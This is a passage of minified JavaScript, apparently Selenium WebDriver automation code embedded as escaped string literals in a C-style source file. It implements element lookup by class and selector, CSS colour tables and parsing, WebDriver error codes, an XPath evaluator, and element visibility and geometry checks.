"ull}function la(a){this.j=a||k.document||document}\nfunction z(a,b,c,d)"\
"{a=d||a.j;b=b&&\"*\"!=b?b.toUpperCase():\"\";if(a.querySelectorAll&&a.q"\
"uerySelector&&(b||c))c=a.querySelectorAll(b+(c?\".\"+c:\"\"));else if(c"\
"&&a.getElementsByClassName)if(a=a.getElementsByClassName(c),b){d={};for"\
"(var e=0,f=0,g;g=a[f];f++)b==g.nodeName&&(d[e++]=g);d.length=e;c=d}else"\
" c=a;else if(a=a.getElementsByTagName(b||\"*\"),c){d={};for(f=e=0;g=a[f"\
"];f++)b=g.className,\"function\"==typeof b.split&&t(b.split(/\\s+/),c)&"\
"&(d[e++]=g);d.length=e;c=d}else c=a;return c}\nfunction ra(a){var b=a.j"\
";a=b.body;b=b.parentWindow||b.defaultView;return new u(b.pageXOffset||a"\
".scrollLeft,b.pageYOffset||a.scrollTop)}la.prototype.contains=y;var A={"\
"n:function(a){return!(!a.querySelectorAll||!a.querySelector)},c:functio"\
"n(a,b){if(!a)throw Error(\"No class name specified\");a=p(a);if(1<a.spl"\
"it(/\\s+/).length)throw Error(\"Compound class names not permitted\");i"\
"f(A.n(b))return b.querySelector(\".\"+a.replace(/\\./g,\"\\\\.\"))||nul"\
"l;var c=z(w(b),\"*\",a,b);return c.length?c[0]:null},d:function(a,b){if"\
"(!a)throw Error(\"No class name specified\");a=p(a);if(1<a.split(/\\s+/"\
").length)throw Error(\"Compound class names not permitted\");return A.n"\
"(b)?b.querySelectorAll(\".\"+\na.replace(/\\./g,\"\\\\.\")):z(w(b),\"*"\
"\",a,b)}};var C={c:function(a,b){n(b.querySelector);if(!a)throw Error("\
"\"No selector specified\");a=p(a);var c=b.querySelector(a);return c&&1="\
"=c.nodeType?c:null},d:function(a,b){n(b.querySelectorAll);if(!a)throw E"\
"rror(\"No selector specified\");a=p(a);return b.querySelectorAll(a)}};v"\
"ar sa={aliceblue:\"#f0f8ff\",antiquewhite:\"#faebd7\",aqua:\"#00ffff\","\
"aquamarine:\"#7fffd4\",azure:\"#f0ffff\",beige:\"#f5f5dc\",bisque:\"#ff"\
"e4c4\",black:\"#000000\",blanchedalmond:\"#ffebcd\",blue:\"#0000ff\",bl"\
"ueviolet:\"#8a2be2\",brown:\"#a52a2a\",burlywood:\"#deb887\",cadetblue:"\
"\"#5f9ea0\",chartreuse:\"#7fff00\",chocolate:\"#d2691e\",coral:\"#ff7f5"\
"0\",cornflowerblue:\"#6495ed\",cornsilk:\"#fff8dc\",crimson:\"#dc143c\""\
",cyan:\"#00ffff\",darkblue:\"#00008b\",darkcyan:\"#008b8b\",darkgoldenr"\
"od:\"#b8860b\",darkgray:\"#a9a9a9\",darkgreen:\"#006400\",\ndarkgrey:\""\
"#a9a9a9\",darkkhaki:\"#bdb76b\",darkmagenta:\"#8b008b\",darkolivegreen:"\
"\"#556b2f\",darkorange:\"#ff8c00\",darkorchid:\"#9932cc\",darkred:\"#8b"\
"0000\",darksalmon:\"#e9967a\",darkseagreen:\"#8fbc8f\",darkslateblue:\""\
"#483d8b\",darkslategray:\"#2f4f4f\",darkslategrey:\"#2f4f4f\",darkturqu"\
"oise:\"#00ced1\",darkviolet:\"#9400d3\",deeppink:\"#ff1493\",deepskyblu"\
"e:\"#00bfff\",dimgray:\"#696969\",dimgrey:\"#696969\",dodgerblue:\"#1e9"\
"0ff\",firebrick:\"#b22222\",floralwhite:\"#fffaf0\",forestgreen:\"#228b"\
"22\",fuchsia:\"#ff00ff\",gainsboro:\"#dcdcdc\",\nghostwhite:\"#f8f8ff\""\
",gold:\"#ffd700\",goldenrod:\"#daa520\",gray:\"#808080\",green:\"#00800"\
"0\",greenyellow:\"#adff2f\",grey:\"#808080\",honeydew:\"#f0fff0\",hotpi"\
"nk:\"#ff69b4\",indianred:\"#cd5c5c\",indigo:\"#4b0082\",ivory:\"#fffff0"\
"\",khaki:\"#f0e68c\",lavender:\"#e6e6fa\",lavenderblush:\"#fff0f5\",law"\
"ngreen:\"#7cfc00\",lemonchiffon:\"#fffacd\",lightblue:\"#add8e6\",light"\
"coral:\"#f08080\",lightcyan:\"#e0ffff\",lightgoldenrodyellow:\"#fafad2"\
"\",lightgray:\"#d3d3d3\",lightgreen:\"#90ee90\",lightgrey:\"#d3d3d3\",l"\
"ightpink:\"#ffb6c1\",lightsalmon:\"#ffa07a\",\nlightseagreen:\"#20b2aa"\
"\",lightskyblue:\"#87cefa\",lightslategray:\"#778899\",lightslategrey:"\
"\"#778899\",lightsteelblue:\"#b0c4de\",lightyellow:\"#ffffe0\",lime:\"#"\
"00ff00\",limegreen:\"#32cd32\",linen:\"#faf0e6\",magenta:\"#ff00ff\",ma"\
"roon:\"#800000\",mediumaquamarine:\"#66cdaa\",mediumblue:\"#0000cd\",me"\
"diumorchid:\"#ba55d3\",mediumpurple:\"#9370db\",mediumseagreen:\"#3cb37"\
"1\",mediumslateblue:\"#7b68ee\",mediumspringgreen:\"#00fa9a\",mediumtur"\
"quoise:\"#48d1cc\",mediumvioletred:\"#c71585\",midnightblue:\"#191970\""\
",mintcream:\"#f5fffa\",mistyrose:\"#ffe4e1\",\nmoccasin:\"#ffe4b5\",nav"\
"ajowhite:\"#ffdead\",navy:\"#000080\",oldlace:\"#fdf5e6\",olive:\"#8080"\
"00\",olivedrab:\"#6b8e23\",orange:\"#ffa500\",orangered:\"#ff4500\",orc"\
"hid:\"#da70d6\",palegoldenrod:\"#eee8aa\",palegreen:\"#98fb98\",paletur"\
"quoise:\"#afeeee\",palevioletred:\"#db7093\",papayawhip:\"#ffefd5\",pea"\
"chpuff:\"#ffdab9\",peru:\"#cd853f\",pink:\"#ffc0cb\",plum:\"#dda0dd\",p"\
"owderblue:\"#b0e0e6\",purple:\"#800080\",red:\"#ff0000\",rosybrown:\"#b"\
"c8f8f\",royalblue:\"#4169e1\",saddlebrown:\"#8b4513\",salmon:\"#fa8072"\
"\",sandybrown:\"#f4a460\",seagreen:\"#2e8b57\",\nseashell:\"#fff5ee\",s"\
"ienna:\"#a0522d\",silver:\"#c0c0c0\",skyblue:\"#87ceeb\",slateblue:\"#6"\
"a5acd\",slategray:\"#708090\",slategrey:\"#708090\",snow:\"#fffafa\",sp"\
"ringgreen:\"#00ff7f\",steelblue:\"#4682b4\",tan:\"#d2b48c\",teal:\"#008"\
"080\",thistle:\"#d8bfd8\",tomato:\"#ff6347\",turquoise:\"#40e0d0\",viol"\
"et:\"#ee82ee\",wheat:\"#f5deb3\",white:\"#ffffff\",whitesmoke:\"#f5f5f5"\
"\",yellow:\"#ffff00\",yellowgreen:\"#9acd32\"};var ta=\"background-colo"\
"r border-top-color border-right-color border-bottom-color border-left-c"\
"olor color outline-color\".split(\" \"),ua=/#([0-9a-fA-F])([0-9a-fA-F])"\
"([0-9a-fA-F])/;function va(a){if(!wa.test(a))throw Error(\"'\"+a+\"' is"\
" not a valid hex color\");4==a.length&&(a=a.replace(ua,\"#$1$1$2$2$3$3"\
"\"));return a.toLowerCase()}var wa=/^#(?:[0-9a-f]{3}){1,2}$/i,xa=/^(?:r"\
"gba)?\\((\\d{1,3}),\\s?(\\d{1,3}),\\s?(\\d{1,3}),\\s?(0|1|0\\.\\d*)\\)$"\
"/i;\nfunction ya(a){var b=a.match(xa);if(b){a=Number(b[1]);var c=Number"\
"(b[2]),d=Number(b[3]),b=Number(b[4]);if(0<=a&&255>=a&&0<=c&&255>=c&&0<="\
"d&&255>=d&&0<=b&&1>=b)return[a,c,d,b]}return[]}var za=/^(?:rgb)?\\((0|["\
"1-9]\\d{0,2}),\\s?(0|[1-9]\\d{0,2}),\\s?(0|[1-9]\\d{0,2})\\)$/i;functio"\
"n Aa(a){var b=a.match(za);if(b){a=Number(b[1]);var c=Number(b[2]),b=Num"\
"ber(b[3]);if(0<=a&&255>=a&&0<=c&&255>=c&&0<=b&&255>=b)return[a,c,b]}ret"\
"urn[]};function D(a,b){this.code=a;this.state=Ba[a]||Ca;this.message=b|"\
"|\"\";var c=this.state.replace(/((?:^|\\s+)[a-z])/g,function(a){return "\
"a.toUpperCase().replace(/^[\\s\\xa0]+/g,\"\")}),d=c.length-5;if(0>d||c."\
"indexOf(\"Error\",d)!=d)c+=\"Error\";this.name=c;c=Error(this.message);"\
"c.name=this.name;this.stack=c.stack||\"\"}(function(){var a=Error;funct"\
"ion b(){}b.prototype=a.prototype;D.P=a.prototype;D.prototype=new b})();"\
"\nvar Ca=\"unknown error\",Ba={15:\"element not selectable\",11:\"eleme"\
"nt not visible\",31:\"ime engine activation failed\",30:\"ime not avail"\
"able\",24:\"invalid cookie domain\",29:\"invalid element coordinates\","\
"12:\"invalid element state\",32:\"invalid selector\",51:\"invalid selec"\
"tor\",52:\"invalid selector\",17:\"javascript error\",405:\"unsupported"\
" operation\",34:\"move target out of bounds\",27:\"no such alert\",7:\""\
"no such element\",8:\"no such frame\",23:\"no such window\",28:\"script"\
" timeout\",33:\"session not created\",10:\"stale element reference\",\n"\
"0:\"success\",21:\"timeout\",25:\"unable to set cookie\",26:\"unexpecte"\
"d alert open\"};Ba[13]=Ca;Ba[9]=\"unknown command\";D.prototype.toStrin"\
"g=function(){return this.name+\": \"+this.message};function E(a){var b="\
"null,c=a.nodeType;1==c&&(b=a.textContent,b=void 0==b||null==b?a.innerTe"\
"xt:b,b=void 0==b||null==b?\"\":b);if(\"string\"!=typeof b)if(9==c||1==c"\
"){a=9==c?a.documentElement:a.firstChild;for(var c=0,d=[],b=\"\";a;){do "\
"1!=a.nodeType&&(b+=a.nodeValue),d[c++]=a;while(a=a.firstChild);for(;c&&"\
"!(a=d[--c].nextSibling););}}else b=a.nodeValue;return\"\"+b}\nfunction "\
"F(a,b,c){if(null===b)return!0;try{if(!a.getAttribute)return!1}catch(d){"\
"return!1}return null==c?!!a.getAttribute(b):a.getAttribute(b,2)==c}func"\
"tion G(a,b,c,d,e){return Da.call(null,a,b,l(c)?c:null,l(d)?d:null,e||ne"\
"w H)}\nfunction Da(a,b,c,d,e){b.getElementsByName&&d&&\"name\"==c?(b=b."\
"getElementsByName(d),r(b,function(b){a.matches(b)&&e.add(b)})):b.getEle"\
"mentsByClassName&&d&&\"class\"==c?(b=b.getElementsByClassName(d),r(b,fu"\
"nction(b){b.className==d&&a.matches(b)&&e.add(b)})):b.getElementsByTagN"\
"ame&&(b=b.getElementsByTagName(a.getName()),r(b,function(a){F(a,c,d)&&e"\
".add(a)}));return e}function Ea(a,b,c,d,e){for(b=b.firstChild;b;b=b.nex"\
"tSibling)F(b,c,d)&&a.matches(b)&&e.add(b);return e};function H(){this.f"\
"=this.e=null;this.k=0}function Fa(a){this.t=a;this.next=this.m=null}H.p"\
"rototype.unshift=function(a){a=new Fa(a);a.next=this.e;this.f?this.e.m="\
"a:this.e=this.f=a;this.e=a;this.k++};H.prototype.add=function(a){a=new "\
"Fa(a);a.m=this.f;this.e?this.f.next=a:this.e=this.f=a;this.f=a;this.k++"\
"};function Ga(a){return(a=a.e)?a.t:null}function I(a){return new Ha(a,!"\
"1)}function Ha(a,b){this.M=a;this.p=(this.u=b)?a.f:a.e;this.B=null}\nHa"\
".prototype.next=function(){var a=this.p;if(null==a)return null;var b=th"\
"is.B=a;this.p=this.u?a.m:a.next;return b.t};function J(a,b,c,d,e){b=b.e"\
"valuate(d);c=c.evaluate(d);var f;if(b instanceof H&&c instanceof H){e=I"\
"(b);for(d=e.next();d;d=e.next())for(b=I(c),f=b.next();f;f=b.next())if(a"\
"(E(d),E(f)))return!0;return!1}if(b instanceof H||c instanceof H){b inst"\
"anceof H?e=b:(e=c,c=b);e=I(e);b=typeof c;for(d=e.next();d;d=e.next()){s"\
"witch(b){case \"number\":d=+E(d);break;case \"boolean\":d=!!E(d);break;"\
"case \"string\":d=E(d);break;default:throw Error(\"Illegal primitive ty"\
"pe for comparison.\");}if(a(d,c))return!0}return!1}return e?\n\"boolean"\
"\"==typeof b||\"boolean\"==typeof c?a(!!b,!!c):\"number\"==typeof b||\""\
"number\"==typeof c?a(+b,+c):a(b,c):a(+b,+c)}function Ia(a,b,c,d){this.C"\
"=a;this.O=b;this.A=c;this.i=d}Ia.prototype.toString=function(){return t"\
"his.C};var Ja={};function K(a,b,c,d){if(a in Ja)throw Error(\"Binary op"\
"erator already created: \"+a);a=new Ia(a,b,c,d);Ja[a.toString()]=a}K(\""\
"div\",6,1,function(a,b,c){return a.b(c)/b.b(c)});K(\"mod\",6,1,function"\
"(a,b,c){return a.b(c)%b.b(c)});K(\"*\",6,1,function(a,b,c){return a.b(c"\
")*b.b(c)});\nK(\"+\",5,1,function(a,b,c){return a.b(c)+b.b(c)});K(\"-\""\
",5,1,function(a,b,c){return a.b(c)-b.b(c)});K(\"<\",4,2,function(a,b,c)"\
"{return J(function(a,b){return a<b},a,b,c)});K(\">\",4,2,function(a,b,c"\
"){return J(function(a,b){return a>b},a,b,c)});K(\"<=\",4,2,function(a,b"\
",c){return J(function(a,b){return a<=b},a,b,c)});K(\">=\",4,2,function("\
"a,b,c){return J(function(a,b){return a>=b},a,b,c)});K(\"=\",3,2,functio"\
"n(a,b,c){return J(function(a,b){return a==b},a,b,c,!0)});\nK(\"!=\",3,2"\
",function(a,b,c){return J(function(a,b){return a!=b},a,b,c,!0)});K(\"an"\
"d\",2,2,function(a,b,c){return a.h(c)&&b.h(c)});K(\"or\",1,2,function(a"\
",b,c){return a.h(c)||b.h(c)});function Ka(a,b,c,d,e,f,g,q,m){this.l=a;t"\
"his.A=b;this.L=c;this.K=d;this.J=e;this.i=f;this.I=g;this.H=void 0!==q?"\
"q:g;this.N=!!m}Ka.prototype.toString=function(){return this.l};var La={"\
"};function L(a,b,c,d,e,f,g,q){if(a in La)throw Error(\"Function already"\
" created: \"+a+\".\");La[a]=new Ka(a,b,c,d,!1,e,f,g,q)}L(\"boolean\",2,"\
"!1,!1,function(a,b){return b.h(a)},1);L(\"ceiling\",1,!1,!1,function(a,"\
"b){return Math.ceil(b.b(a))},1);\nL(\"concat\",3,!1,!1,function(a,b){va"\
"r c=ia(arguments,1);return fa(c,function(b,c){return b+c.a(a)})},2,null"\
");L(\"contains\",2,!1,!1,function(a,b,c){b=b.a(a);a=c.a(a);return-1!=b."\
"indexOf(a)},2);L(\"count\",1,!1,!1,function(a,b){return b.evaluate(a).k"\
"},1,1,!0);L(\"false\",2,!1,!1,h(!1),0);L(\"floor\",1,!1,!1,function(a,b"\
"){return Math.floor(b.b(a))},1);\nL(\"id\",4,!1,!1,function(a,b){var c="\
"a.g(),d=9==c.nodeType?c:c.ownerDocument,c=b.a(a).split(/\\s+/),e=[];r(c"\
",function(a){(a=d.getElementById(a))&&!t(e,a)&&e.push(a)});e.sort(na);v"\
"ar f=new H;r(e,function(a){f.add(a)});return f},1);L(\"lang\",2,!1,!1,h"\
"(!1),1);L(\"last\",1,!0,!1,function(a){if(1!=arguments.length)throw Err"\
"or(\"Function last expects ()\");return a.F()},0);L(\"local-name\",3,!1"\
",!0,function(a,b){var c=b?Ga(b.evaluate(a)):a.g();return c?c.nodeName.t"\
"oLowerCase():\"\"},0,1,!0);\nL(\"name\",3,!1,!0,function(a,b){var c=b?G"\
"a(b.evaluate(a)):a.g();return c?c.nodeName.toLowerCase():\"\"},0,1,!0);"\
"L(\"namespace-uri\",3,!0,!1,h(\"\"),0,1,!0);L(\"normalize-space\",3,!1,"\
"!0,function(a,b){return(b?b.a(a):E(a.g())).replace(/[\\s\\xa0]+/g,\" \""\
").replace(/^\\s+|\\s+$/g,\"\")},0,1);L(\"not\",2,!1,!1,function(a,b){re"\
"turn!b.h(a)},1);L(\"number\",1,!1,!0,function(a,b){return b?b.b(a):+E(a"\
".g())},0,1);L(\"position\",1,!0,!1,function(a){return a.G()},0);L(\"rou"\
"nd\",1,!1,!1,function(a,b){return Math.round(b.b(a))},1);\nL(\"starts-w"\
"ith\",2,!1,!1,function(a,b,c){b=b.a(a);a=c.a(a);return 0==b.lastIndexOf"\
"(a,0)},2);L(\"string\",3,!1,!0,function(a,b){return b?b.a(a):E(a.g())},"\
"0,1);L(\"string-length\",1,!1,!0,function(a,b){return(b?b.a(a):E(a.g())"\
").length},0,1);\nL(\"substring\",3,!1,!1,function(a,b,c,d){c=c.b(a);if("\
"isNaN(c)||Infinity==c||-Infinity==c)return\"\";d=d?d.b(a):Infinity;if(i"\
"sNaN(d)||-Infinity===d)return\"\";c=Math.round(c)-1;var e=Math.max(c,0)"\
";a=b.a(a);if(Infinity==d)return a.substring(e);b=Math.round(d);return a"\
".substring(e,c+b)},2,3);L(\"substring-after\",3,!1,!1,function(a,b,c){b"\
"=b.a(a);a=c.a(a);c=b.indexOf(a);return-1==c?\"\":b.substring(c+a.length"\
")},2);\nL(\"substring-before\",3,!1,!1,function(a,b,c){b=b.a(a);a=c.a(a"\
");a=b.indexOf(a);return-1==a?\"\":b.substring(0,a)},2);L(\"sum\",1,!1,!"\
"1,function(a,b){for(var c=I(b.evaluate(a)),d=0,e=c.next();e;e=c.next())"\
"d+=+E(e);return d},1,1,!0);L(\"translate\",3,!1,!1,function(a,b,c,d){b="\
"b.a(a);c=c.a(a);var e=d.a(a);a=[];for(d=0;d<c.length;d++){var f=c.charA"\
"t(d);f in a||(a[f]=e.charAt(d))}c=\"\";for(d=0;d<b.length;d++)f=b.charA"\
"t(d),c+=f in a?a[f]:f;return c},3);L(\"true\",2,!1,!1,h(!0),0);function"\
" Ma(a,b,c,d){this.l=a;this.D=b;this.u=c;this.Q=d}Ma.prototype.toString="\
"function(){return this.l};var Na={};function M(a,b,c,d){if(a in Na)thro"\
"w Error(\"Axis already created: \"+a);Na[a]=new Ma(a,b,c,!!d)}M(\"ances"\
"tor\",function(a,b){for(var c=new H,d=b;d=d.parentNode;)a.matches(d)&&c"\
".unshift(d);return c},!0);M(\"ancestor-or-self\",function(a,b){var c=ne"\
"w H,d=b;do a.matches(d)&&c.unshift(d);while(d=d.parentNode);return c},!"\
"0);\nM(\"attribute\",function(a,b){var c=new H,d=a.getName(),e=b.attrib"\
"utes;if(e)if(\"*\"==d)for(var d=0,f;f=e[d];d++)c.add(f);else(f=e.getNam"\
"edItem(d))&&c.add(f);return c},!1);M(\"child\",function(a,b,c,d,e){retu"\
"rn Ea.call(null,a,b,l(c)?c:null,l(d)?d:null,e||new H)},!1,!0);M(\"desce"\
"ndant\",G,!1,!0);M(\"descendant-or-self\",function(a,b,c,d){var e=new H"\
";F(b,c,d)&&a.matches(b)&&e.add(b);return G(a,b,c,d,e)},!1,!0);\nM(\"fol"\
"lowing\",function(a,b,c,d){var e=new H;do for(var f=b;f=f.nextSibling;)"\
"F(f,c,d)&&a.matches(f)&&e.add(f),e=G(a,f,c,d,e);while(b=b.parentNode);r"\
"eturn e},!1,!0);M(\"following-sibling\",function(a,b){for(var c=new H,d"\
"=b;d=d.nextSibling;)a.matches(d)&&c.add(d);return c},!1);M(\"namespace"\
"\",function(){return new H},!1);M(\"parent\",function(a,b){var c=new H;"\
"if(9==b.nodeType)return c;if(2==b.nodeType)return c.add(b.ownerElement)"\
",c;var d=b.parentNode;a.matches(d)&&c.add(d);return c},!1);\nM(\"preced"\
"ing\",function(a,b,c,d){var e=new H,f=[];do f.unshift(b);while(b=b.pare"\
"ntNode);for(var g=1,q=f.length;g<q;g++){var m=[];for(b=f[g];b=b.previou"\
"sSibling;)m.unshift(b);for(var B=0,ab=m.length;B<ab;B++)b=m[B],F(b,c,d)"\
"&&a.matches(b)&&e.add(b),e=G(a,b,c,d,e)}return e},!0,!0);M(\"preceding-"\
"sibling\",function(a,b){for(var c=new H,d=b;d=d.previousSibling;)a.matc"\
"hes(d)&&c.unshift(d);return c},!0);M(\"self\",function(a,b){var c=new H"\
";a.matches(b)&&c.add(b);return c},!1);var N={};N.w=function(){var a={R:"\
"\"http://www.w3.org/2000/svg\"};return function(b){return a[b]||null}}("\
");N.i=function(a,b,c){var d=x(a);try{var e=d.createNSResolver?d.createN"\
"SResolver(d.documentElement):N.w;return d.evaluate(b,a,e,c,null)}catch("\
"f){throw new D(32,\"Unable to locate an element with the xpath expressi"\
"on \"+b+\" because of the following error:\\n\"+f);}};N.o=function(a,b)"\
"{if(!a||1!=a.nodeType)throw new D(32,'The result of the xpath expressio"\
"n \"'+b+'\" is: '+a+\". It should be an element.\");};\nN.c=function(a,"\
"b){var c=function(){var c=N.i(b,a,9);return c?c.singleNodeValue||null:b"\
".selectSingleNode?(c=x(b),c.setProperty&&c.setProperty(\"SelectionLangu"\
"age\",\"XPath\"),b.selectSingleNode(a)):null}();null===c||N.o(c,a);retu"\
"rn c};\nN.d=function(a,b){var c=function(){var c=N.i(b,a,7);if(c){for(v"\
"ar e=c.snapshotLength,f=[],g=0;g<e;++g)f.push(c.snapshotItem(g));return"\
" f}return b.selectNodes?(c=x(b),c.setProperty&&c.setProperty(\"Selectio"\
"nLanguage\",\"XPath\"),b.selectNodes(a)):[]}();r(c,function(b){N.o(b,a)"\
"});return c};function O(a,b,c,d){this.left=a;this.top=b;this.width=c;th"\
"is.height=d}O.prototype.toString=function(){return\"(\"+this.left+\", "\
"\"+this.top+\" - \"+this.width+\"w x \"+this.height+\"h)\"};O.prototype"\
".contains=function(a){return a instanceof O?this.left<=a.left&&this.lef"\
"t+this.width>=a.left+a.width&&this.top<=a.top&&this.top+this.height>=a."\
"top+a.height:a.x>=this.left&&a.x<=this.left+this.width&&a.y>=this.top&&"\
"a.y<=this.top+this.height};\nO.prototype.ceil=function(){this.left=Math"\
".ceil(this.left);this.top=Math.ceil(this.top);this.width=Math.ceil(this"\
".width);this.height=Math.ceil(this.height);return this};O.prototype.flo"\
"or=function(){this.left=Math.floor(this.left);this.top=Math.floor(this."\
"top);this.width=Math.floor(this.width);this.height=Math.floor(this.heig"\
"ht);return this};\nO.prototype.round=function(){this.left=Math.round(th"\
"is.left);this.top=Math.round(this.top);this.width=Math.round(this.width"\
");this.height=Math.round(this.height);return this};function Oa(a,b){var"\
" c=x(a);return c.defaultView&&c.defaultView.getComputedStyle&&(c=c.defa"\
"ultView.getComputedStyle(a,null))?c[b]||c.getPropertyValue(b)||\"\":\""\
"\"}function P(a){return Oa(a,\"position\")||(a.currentStyle?a.currentSt"\
"yle.position:null)||a.style&&a.style.position}function Pa(a){var b;try{"\
"b=a.getBoundingClientRect()}catch(c){return{left:0,top:0,right:0,bottom"\
":0}}return b}\nfunction Qa(a){var b=x(a),c=P(a),d=\"fixed\"==c||\"absol"\
"ute\"==c;for(a=a.parentNode;a&&a!=b;a=a.parentNode)if(c=P(a),d=d&&\"sta"\
"tic\"==c&&a!=b.documentElement&&a!=b.body,!d&&(a.scrollWidth>a.clientWi"\
"dth||a.scrollHeight>a.clientHeight||\"fixed\"==c||\"absolute\"==c||\"re"\
"lative\"==c))return a;return null}\nfunction Ra(a){if(1==a.nodeType){va"\
"r b;if(a.getBoundingClientRect)b=Pa(a),b=new u(b.left,b.top);else{b=ra("\
"w(a));var c=x(a),d=P(a),e=new u(0,0),f=(c?x(c):document).documentElemen"\
"t;if(a!=f)if(a.getBoundingClientRect)a=Pa(a),c=ra(w(c)),e.x=a.left+c.x,"\
"e.y=a.top+c.y;else if(c.getBoxObjectFor)a=c.getBoxObjectFor(a),c=c.getB"\
"oxObjectFor(f),e.x=a.screenX-c.screenX,e.y=a.screenY-c.screenY;else{var"\
" g=a;do{e.x+=g.offsetLeft;e.y+=g.offsetTop;g!=a&&(e.x+=g.clientLeft||0,"\
"e.y+=g.clientTop||0);if(\"fixed\"==P(g)){e.x+=\nc.body.scrollLeft;e.y+="\
"c.body.scrollTop;break}g=g.offsetParent}while(g&&g!=a);\"absolute\"==d&"\
"&(e.y-=c.body.offsetTop);for(g=a;(g=Qa(g))&&g!=c.body&&g!=f;)e.x-=g.scr"\
"ollLeft,e.y-=g.scrollTop}b=new u(e.x-b.x,e.y-b.y)}return b}b=n(a.q);e=a"\
";a.targetTouches?e=a.targetTouches[0]:b&&a.q().targetTouches&&(e=a.q()."\
"targetTouches[0]);return new u(e.clientX,e.clientY)};function Q(a,b){re"\
"turn!!a&&1==a.nodeType&&(!b||a.tagName.toUpperCase()==b)}var Sa=/[;]+(?"\
"=(?:(?:[^\"]*\"){2})*[^\"]*$)(?=(?:(?:[^']*'){2})*[^']*$)(?=(?:[^()]*"\
"\\([^()]*\\))*[^()]*$)/;function Ta(a){var b=[];r(a.split(Sa),function("\
"a){var d=a.indexOf(\":\");0<d&&(a=[a.slice(0,d),a.slice(d+1)],2==a.leng"\
"th&&b.push(a[0].toLowerCase(),\":\",a[1],\";\"))});b=b.join(\"\");retur"\
"n b=\";\"==b.charAt(b.length-1)?b:b+\";\"}\nfunction R(a,b){b=b.toLower"\
"Case();if(\"style\"==b)return Ta(a.style.cssText);var c=a.getAttributeN"\
"ode(b);return c&&c.specified?c.value:null}function S(a){for(a=a.parentN"\
"ode;a&&1!=a.nodeType&&9!=a.nodeType&&11!=a.nodeType;)a=a.parentNode;ret"\
"urn Q(a)?a:null}\nfunction T(a,b){var c=da(b);if(\"float\"==c||\"cssFlo"\
"at\"==c||\"styleFloat\"==c)c=\"cssFloat\";c=Oa(a,c)||Ua(a,c);if(null==="\
"c)c=null;else if(t(ta,b)&&(wa.test(\"#\"==c.charAt(0)?c:\"#\"+c)||Aa(c)"\
".length||sa&&sa[c.toLowerCase()]||ya(c).length)){var d=ya(c);if(!d.leng"\
"th){a:if(d=Aa(c),!d.length){d=(d=sa[c.toLowerCase()])?d:\"#\"==c.charAt"\
"(0)?c:\"#\"+c;if(wa.test(d)&&(d=va(d),d=va(d),d=[parseInt(d.substr(1,2)"\
",16),parseInt(d.substr(3,2),16),parseInt(d.substr(5,2),16)],d.length))b"\
"reak a;d=[]}3==d.length&&d.push(1)}c=4!=\nd.length?c:\"rgba(\"+d.join("\
"\", \")+\")\"}return c}function Ua(a,b){var c=a.currentStyle||a.style,d"\
"=c[b];void 0===d&&n(c.getPropertyValue)&&(d=c.getPropertyValue(b));retu"\
"rn\"inherit\"!=d?void 0!==d?d:null:(c=S(a))?Ua(c,b):null}\nfunction Va("\
"a,b){function c(a){if(\"none\"==T(a,\"display\"))return!1;a=S(a);return"\
"!a||c(a)}function d(a){var b=U(a);return 0<b.height&&0<b.width?!0:Q(a,"\
"\"PATH\")&&(0<b.height||0<b.width)?(a=T(a,\"stroke-width\"),!!a&&0<pars"\
"eInt(a,10)):\"hidden\"!=T(a,\"overflow\")&&ga(a.childNodes,function(a){"\
"return a.nodeType==ka||Q(a)&&d(a)})}function e(a){var b=T(a,\"-o-transf"\
"orm\")||T(a,\"-webkit-transform\")||T(a,\"-ms-transform\")||T(a,\"-moz-"\
"transform\")||T(a,\"transform\");if(b&&\"none\"!==b)return b=Ra(a),a=U("\
"a),0<=b.x+a.width&&\n0<=b.y+a.height?!0:!1;a=S(a);return!a||e(a)}if(!Q("\
"a))throw Error(\"Argument to isShown must be of type Element\");if(Q(a,"\
"\"OPTION\")||Q(a,\"OPTGROUP\")){var f=qa(a,function(a){return Q(a,\"SEL"\
"ECT\")});return!!f&&Va(f,!0)}return(f=Wa(a))?!!f.r&&0<f.rect.width&&0<f"\
".rect.height&&Va(f.r,b):Q(a,\"INPUT\")&&\"hidden\"==a.type.toLowerCase("\
")||Q(a,\"NOSCRIPT\")||\"hidden\"==T(a,\"visibility\")||!c(a)||!b&&0==Xa"\
"(a)||!d(a)||Ya(a)==V?!1:e(a)}var V=\"hidden\";\nfunction Ya(a){function"\
" b(a){var b=a;if(\"visible\"==q)if(a==f)b=g;else if(a==g)return{x:\"vis"\
"ible\",y:\"visible\"};b={x:T(b,\"overflow-x\"),y:T(b,\"overflow-y\")};a"\
"==f&&(b.x=\"hidden\"==b.x?\"hidden\":\"auto\",b.y=\"hidden\"==b.y?\"hid"\
"den\":\"auto\");return b}function c(a){var b=T(a,\"position\");if(\"fix"\
"ed\"==b)return f;for(a=S(a);a&&a!=f&&(0==T(a,\"display\").lastIndexOf("\
"\"inline\",0)||\"absolute\"==b&&\"static\"==T(a,\"position\"));)a=S(a);"\
"return a}var d=U(a),e=x(a),f=e.documentElement,g=e.body,q=T(f,\"overflo"\
"w\");for(a=c(a);a;a=\nc(a)){var m=U(a),e=b(a),B=d.left>=m.left+m.width,"\
"m=d.top>=m.top+m.height;if(B&&\"hidden\"==e.x||m&&\"hidden\"==e.y)retur"\
"n V;if(B&&\"visible\"!=e.x||m&&\"visible\"!=e.y)return Ya(a)==V?V:\"scr"\
"oll\"}return\"none\"}\nfunction U(a){var b=Wa(a);if(b)return b.rect;if("\
"n(a.getBBox))try{var c=a.getBBox();return new O(c.x,c.y,c.width,c.heigh"\
"t)}catch(d){throw d;}else{if(Q(a,\"HTML\"))return a=((x(a)?x(a).parentW"\
"indow||x(a).defaultView:window)||window).document,a=\"CSS1Compat\"==a.c"\
"ompatMode?a.documentElement:a.body,a=new v(a.clientWidth,a.clientHeight"\
"),new O(0,0,a.width,a.height);var b=Ra(a),c=a.offsetWidth,e=a.offsetHei"\
"ght;c||(e||!a.getBoundingClientRect)||(a=a.getBoundingClientRect(),c=a."\
"right-a.left,e=a.bottom-a.top);\nreturn new O(b.x,b.y,c,e)}}function Wa"\
"(a){var b=Q(a,\"MAP\");if(!b&&!Q(a,\"AREA\"))return null;var c=b?a:Q(a."\
"parentNode,\"MAP\")?a.parentNode:null,d=null,e=null;if(c&&c.name&&(d=N."\
"c('/descendant::*[@usemap = \"#'+c.name+'\"]',x(c)))&&(e=U(d),!b&&\"def"\
"ault\"!=a.shape.toLowerCase())){var f=Za(a);a=Math.min(Math.max(f.left,"\
"0),e.width);b=Math.min(Math.max(f.top,0),e.height);c=Math.min(f.width,e"\
